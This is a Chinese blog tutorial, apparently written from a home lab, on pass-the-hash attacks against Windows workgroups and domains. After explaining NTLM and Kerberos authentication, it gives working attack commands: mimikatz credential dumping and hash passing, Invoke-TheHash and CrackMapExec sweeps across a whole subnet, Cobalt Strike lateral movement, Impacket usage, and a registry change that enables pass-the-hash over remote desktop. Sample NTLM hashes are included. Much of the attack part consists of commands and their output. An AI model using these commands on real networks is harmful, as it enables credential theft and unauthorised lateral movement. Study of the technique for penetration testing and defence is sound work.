PTH哈希传递攻击

于 2024-05-23 08:57:04 发布
阅读量813 收藏 21
点赞数 22
分类专栏: 内网篇 文章标签: 哈希算法 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y22Lee/article/details/139124746
版权

一.PTH哈希传递攻击原理条件

1.PTH介绍

PTH(Pass The Hash),中文叫哈希传递攻击,在NTLM和Kerberos认证中,都需要用到用户的NTLM-Hash值进行加密认证,所以我们知道了对方用户的NTLN-Hash值之后就可以使用PTH进行认证。
在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。

2. PTH原理 - NTLM认证中

Response是如何生成的呢?
他是由 Response =NTProofStr+blob两部分拼接起来的

NTProofStr : NTLM-v2-Hash值 和 challenge+blob 进行 HMAC-MD5加密
NTLM-v2-Hash: 大写的用户名+域名编码成unicode格式,然后和密码的NTLM-Hash值进行HMAC-MD5加密
blob是由时间,目标信息,随机填充字符等生成。
3. PTH的原理-kerberos认证中

AS-REQ(AS-requests):主要包含了用户的一些信息,是由客户端发送给AS的数据包。里面有几个
重要信息:

PA-DATA pA-ENC-TIMESTAMP 使用用户的hash,或者AES key加密时间戳 生成value  
PA-DATA pA-PAC-REQUEST,是否包含了PAC
kdc-options 协商字段
cname 请求的用户名
realm: 域名
sname 请求的服务
3. PTH的条件
有管理员的 NTLM Hash ,并且目标机器开放445端口
内网中使用相同的账号密码
开放了445端口

哪种账号可以PTH?

域管理员administrator
普通域管理员(admin domain组中的用户)
普通域用户
本地管理员administrator
本地普通管理员
本地普通用户

二.不同用户下的PTH区别

1.本地测试

在每个机器上执行如下的命令:

@echo off
net user administrator /active:yes
net user administrator Admin123
net user LEE Lyp010822 /add
net localgroup administrators LEE /add
net user test LYp010822 /add

然后使用mimikatz进行PTH进行测试

命令:mimikatz.exe “privilege::debug” “sekurlsa::pth /user:用户名 /domain:域名或者IP /ntlm:ntlm-hash

执行完成之后会弹出一个cmd

抓取命令

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam“

每个用户的hash值如下:
在这里插入图片描述

User : Administrator
Hash NTLM: e45a314c664d40a227f9540121d1a29d

User : LEE
Hash NTLM: 25b73c91d04dea594786e04d7bb38cee

User : test
Hash NTLM: 346e09c4c3297dbc814c9ee8a6144fcf

本地账号(administrator)
这里使用不同的机器进行PTH攻击,电脑上都有相同的账号密码,测试结果如下:

server 2003
在这里插入图片描述
server 2012
在这里插入图片描述
server 2008 R2
在这里插入图片描述
win 10
在这里插入图片描述

本地普通管理员账号(LEE)
我们这里使用不同的机器进行PTH攻击,电脑上都有相同的账号密码,测试结果如下:

server 2003
在这里插入图片描述
server 2012
在这里插入图片描述
server 2008 R2
在这里插入图片描述
win10
在这里插入图片描述

本地普通账号(test)
我们这里使用不同的机器进行PTH攻击,电脑上都有相同的账号密码,测试结果如下:

server 2003
在这里插入图片描述
win 10
在这里插入图片描述
总结

在本地账号的情况下
Administrator 可以进行PTH传递攻击
本地普通管理员,不可以进行PTH攻击(除过早期的电脑 2003 xp)
本地的普通用户,不可以进行PTH攻击
2. 域内测试

测试账号及对应ntlm-hash值:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:25b73c91d04dea594786e04d7bb38cee
LEE:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
test:1115:aad3b435b51404eeaad3b435b51404ee:346e09c4c3297dbc814c9ee8a6144fcf

域超级管理员(administrator)
我们这里使用不同的机器进行PTH攻击,电脑上都有相同的账号密码,测试结果如下:

server 2012(DC)
在这里插入图片描述
server 2008(ONE-PC)
在这里插入图片描述
WIN 10(THREE-PC)
在这里插入图片描述

server 2003(FOUR-PC)
在这里插入图片描述
域普通管理员(LEE)
我们这里使用不同的机器进行PTH攻击,电脑上都有相同的账号密码,测试结果如下:

server 2012 (DC)
在这里插入图片描述
server 2008(ONE-PC)
在这里插入图片描述
WIN 10 (THREE-PC)
在这里插入图片描述
server 2003 (FOUR-PC)
在这里插入图片描述

域普通用户(test)
我们这里使用不同的机器进行PTH攻击,电脑上都有相同的账号密码,测试结果如下:
普通用户都不可进行PTH
在这里插入图片描述
在这里插入图片描述
总结

域账号:
Administrator 可以用来PTH
域普通管理员 可以用来PTH
域普通用户 不可以(默认)

三.Hash碰撞查询可利用的PTH

在内网中系统在安装的时候采用统一的账号密码,当我们获取的一台电脑的Hash值之后(administrator)可以使用hash碰撞的方式进行碰撞,(本质就是批量进行hash传递)找出相同
的账号密码的机器

介绍几个工具可以在不同的环境下进行PTH

Powershell脚本
EXE工具

可以使用CrackMapExec工具,进行批量的hash传递攻击,测试内网中具有相同账号密码的
机器

下载地址:https://github.com/Porchetta-Industries/CrackMapExec/releases/tag/v5.4.0
该工具支持win lin mac 等系

1.powershell脚本

Invoke-TheHash,通过把NTLM hash传递给NTLMv2身份验证协议来进行身份验证的攻击套件,
且执行时客户端不需要本地管理员权限。
条件:PowerShell 2.0及以上(2008之后的都可以使用)

使用方法

Import-Module .Invoke-TheHash.ps1(导入批量模块)
Import-Module .Invoke-WMIExec.ps1(导入wmi模块)
Invoke-TheHash -Type WMIExec -Target 192.168.41.0/24 -Username administrator -Hash 25b73c91d04dea594786e04d7bb38cee

利用CS测试
第一步:上传工具包以及解压工具包的软件
在这里插入图片描述
第二步:
解压Invoke-TheHash.ZIP,会在当前目录生成解压文件
在这里插入图片描述
第三步:
进入目录,导入Invoke-TheHash.psd1入口文件,运行

shell powershell -exec bypass -command "& { Import-Module .\Invoke-TheHash.psd1;Invoke-TheHash -Type WMIExec -Target 192.168.41.0/24 -Username administrator -Hash 25b73c91d04dea594786e04d7bb38cee}"

在这里插入图片描述

本地测试

在这里插入图片描述

2.EXE工具

CrackMapExec,该工具的用处非常多我们只介绍批量PTH的用法,支持windows和python,kali 中自带该工具。
第一步:上传ZIP文件,然后解压
在这里插入图片描述
在这里插入图片描述
第二步:运行批量PTH的命令

crackmapexec.exe 192.168.41.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:25b73c91d04dea594786e04d7bb38cee

在这里插入图片描述

“+”代表成功的

本地测试

在这里插入图片描述

四.CS下的PTH工具横向上线

通过上面实验知道了PTH,本质是上认证,之前IPC$我们是通过账号密码进行认证的PTH是通过账号和hash值进行认证的,但是光认证还是不够的,认证通过之后还需要配合上传,计划任务,服务等其他的操作进行上线,接下来我们讲解如何进行上线的操作。
方法一
CS自带的插件可以使用PTH直接横向上线
在这里插入图片描述
点击以列表形式展现目标右键选择横向移动上线机器

在这里插入图片描述
配置好使用的账号权限,监听器等
在这里插入图片描述

五.使用Mimikatz工具进行PTH

然后使用mimikatz进行PTH进行测试

命令:
mimikatz.exe “privilege::debug” “sekurlsa::pth /user:用户名 /domain:域名或者IP /ntlm:ntlm- hash

执行完成之后会弹出一个cmd,可以用来执行copy,计划任务,服务等让他上线

CS上测试
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

本地测试

privilege::debug 
sekurlsa::pth /user:用户名 /domain:域名或者IP /ntlm:ntlm-hash
执行完成之后会弹出一个cmd
sekurlsa::pth /user:administrator /domain:192.168.41.40 /ntlm:25b73c91d04dea594786e04d7bb38cee

在这里插入图片描述

六.使用其他工具进行PTH

我们介绍一个工具包Impacket,使用python编写,支持win,这
里我们使用win下的
地址:https://www.secureauth.com/labs/open-source-tools/impacket/

用法
工具用法格式和命令都一样,支持明文密码和Hash值,默认会打开cmd

命令
用户名:密码@IP地址
用户名@IP地址 -hashes LM-HASH:NTLM-HASH
域名/域账号:密码@IP地址(或者全域名)
域名/域账号@IP地址(或者全域名) -hashes LM-HASH:NTLM-HASH

七.利用PTH进行远程桌面

如果说我们PTH攻击之后很多命令不行或者被杀软杀掉了,可以使用PTH RDP的方式,当然一般是高版本的电脑才可以,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启

开启命令:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

命令:
privilege::debug
sekurlsa::pth /user:administrator /domain:192.168.41.139 /ntlm:25b73c91d04dea594786e04d7bb38cee

“/run:mstsc.exe /restrictedadmin

server 2008
在这里插入图片描述
win 10
在这里插入图片描述

Y22Lee
关注
  • 22
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
域渗透之哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 1896
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理。
内网渗透——哈希传递
来日可期的博客
10-09 1119
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
内网渗透 - 哈希传递攻击
LuckySec
06-06 2325
在内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击攻击者不需要花时间破解密码哈希值来获取明文密码
域渗透之Hash传递攻击
最新发布
weixin_65550121的博客
12-08 913
哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统。攻击者无须通过解密hash值来获取明文密码。因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。虽然哈希传递攻击可以在Linux,Unix和其他平台上发生,但它们在windows系统上最普遍。
内网渗透-横向渗透2
huangyongkang666的博客
04-04 2865
内网渗透-横向渗透2 1.域横向 PTH&PTK&PTT 哈希票据传递 1.域横向移动 PTH 传递 PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 1.PTH攻击介绍 ​ PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Ha
关于内网PTH攻击
stopys6的博客
09-21 177
当获取的服务器大于windows server 2008 时无法利用mimikatz获取服务器的明文,使得无法利用明文进行横向。注:只能是administrator、域管用户的哈希值才能进行哈希传递攻击,其他用户(包括加入管理员组用户但是非administrator),域普通用户也不能使用哈希传递攻击。利用工具获取服务器的NTLM,这里使用cs上线win2016机器,利用mimikatz进行抓取凭证。这里尝试了利用普通账号,加入管理员组的账号,普通域账号,加入域管组的域账号进行pth攻击
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
02-06
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
GFPGANv1.4.pth
04-30
GFPGANv1.4.pth下载
pth-toolkit:传递哈希工具集合的修改版本可以直接开箱即用
06-26
传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补工具/实用程序...
GFPGANv1.3.pth
03-24
GFPGANv1.3.pth模型文件 官网:https://github.com/TencentARC/GFPGAN/blob/master/README.md
pth(pass the hash)哈希传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2600
pth(pass-the-hash)哈希传递攻击在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码域/工作组环境账号hash内网中存在和当前机器相同的密码(ps:微软打了KB22871997补丁后只有Administrator(SID 500)可以PTH成功,默认windows server 2012后都会存在补丁)
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1567
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
Windows NTLM Hash和Hash传递、Key传递攻击
weixin_30563917的博客
07-04 1930
Hash(Key) 获取 工具: Mimikatz 用法: .\mimikatz.exe privilege::debug #查看权限 sekurlsa::logonpasswords #获取hash和明文密码(如果可以的话) sekurlsa::ekeys #获取kerberos加密凭证 Hash(Key)传递 Mimikatz sekurlsa::pth /user:xxxxxxx...
哈希传递攻击
good good study
05-05 1436
​ 目标计算机间如果开启了默认共享又关闭了防火墙,我们如果知道它的用户名和密码,则可以进行ipc$连接。其原理是基于ntlm网络认证。但是ipc$连接需要明文的密码,假如我们只获取了密码的hash值解不出明文,该怎么连接了?此时我们可以进行hash传递(Pass-the-Hash),即输入账号和hash值,进行连接 ​
c++ 哈希_传递哈希攻击的原理介绍
weixin_39970064的博客
11-23 252
在渗透测试期间,为了提高审核员对信息系统的权限,很多人都会选择横向移动方法。在这种情况下,称为Pass The Hash(传递哈希)的技术被广泛应用,使审核员成为计算机上的管理员。HTLM协议NTLM协议是在Microsoft环境中使用的一种身份验证协议,特别是,它允许用户向服务器证明自己是谁,以便使用该服务器提供的服务。注意:在本文中,术语“服务器”是在客户端/服务器意义上使用的,“服...
哈希传递攻击(Pass-the-Hash,PtH)
谢公子的博客
01-11 5191
目录 哈希传递攻击 MSF进行哈希传递攻击PtH(工作组) MSF进行哈希传递攻击PtH(域) mimikatz进行哈希传递攻击PtH(工作组) mimikatz进行哈希传递攻击PtH(域) 使用AES进行哈希传递攻击(PTK,Pass The Key) 更新KB2871997补丁产生的影响 哈希传递攻击 哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们...
PtH(hash传递攻击)原理探秘
weixin_30500473的博客
08-10 3573
背景知识 Windows 横向渗透的两种方式 1、hash传递攻击,通过传递NTLM-Hash,登录机器,简称PtH; 2、ticket传递攻击,通过传递kerberos的ticket,登录机器,简称PtT; 以上两种都是常见的域内或者叫做内网渗透的横向移动的常见手段。 NTLM协议机制简述 在hash传递攻击中。传递的就是NTLMhash值,这里我们就要简述一下NTLM的过程。 NT...
哈希传递攻击(Pass-the-Hash)
whoim_i的博客
12-25 9986
目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH(工作组) 使用msf进行哈希传递攻击 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享)打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(注意:只能是adminis...
pth文件
05-25
.pth文件是PyTorch中模型的保存格式,它包含了PyTorch模型的权重参数和网络结构等信息。.pth文件可以用来恢复训练好的模型,或者在其他程序中加载已经训练好的模型,进行预测或fine-tuning等操作。 在PyTorch中,可以使用`torch.save()`函数将模型保存为.pth文件,例如: ```python import torch # 定义模型 model = ... # 保存模型 torch.save(model.state_dict(), 'my_model.pth') ``` 其中,`model.state_dict()`返回模型的所有权重参数,`'my_model.pth'`是保存的文件名。 要加载.pth文件中的模型,可以使用`torch.load()`函数,例如: ```python import torch # 加载模型 model_state_dict = torch.load('my_model.pth') model = ... # 将权重参数加载到模型中 model.load_state_dict(model_state_dict) ``` 其中,`model`是定义好的模型,`model.load_state_dict()`函数将.pth文件中的权重参数加载到模型中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值